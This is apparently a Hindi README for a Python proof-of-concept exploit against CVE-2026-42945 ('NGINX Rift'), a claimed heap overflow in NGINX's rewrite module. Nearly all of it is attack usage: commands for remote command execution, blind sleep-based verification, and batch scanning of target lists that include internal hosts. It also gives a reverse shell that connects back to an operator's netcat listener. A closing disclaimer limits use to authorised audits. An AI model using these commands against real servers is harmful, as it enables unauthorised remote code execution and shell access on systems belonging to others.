
CVE-2026-42945 (NGINX Rift) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जिसमें मल्टी-मोड RCE, ब्लाइंड वेरिफिकेशन, रिवर्स शेल और अधिकृत सुरक्षा अनुसंधान के लिए बैच स्कैनिंग क्षमताएं शामिल हैं।
NGINX Rift भेद्यता, जो ngx_http_rewrite_module में एक गंभीर हीप-आधारित बफर अतिप्रवाह है, के अनुसंधान और पहचान के लिए एक पेशेवर प्रूफ-ऑफ-कॉन्सेप्ट (PoC) उपकरण।
python3 poc.py --url http://target.com --method id
targets.txt नामक फ़ाइल बनाएँ जिसमें प्रति पंक्ति एक URL हो:
http://1.2.3.4
https://docs.company.com
http://server.internal:8080
फिर चलाएँ:
python3 poc.py --list targets.txt --method sleep
python3 poc.py --url http://target.com --cmd "whoami" --verbose
पहले अपना लिसनर प्रारंभ करें: nc -lvp 1337
python3 poc.py --url http://target.com --method shell --listen-ip [YOUR_IP] --listen-port 1337
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा ऑडिट के लिए है। लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। किसी भी बुनियादी ढांचे के खिलाफ परीक्षण करने से पहले हमेशा स्पष्ट अनुमति प्राप्त करें।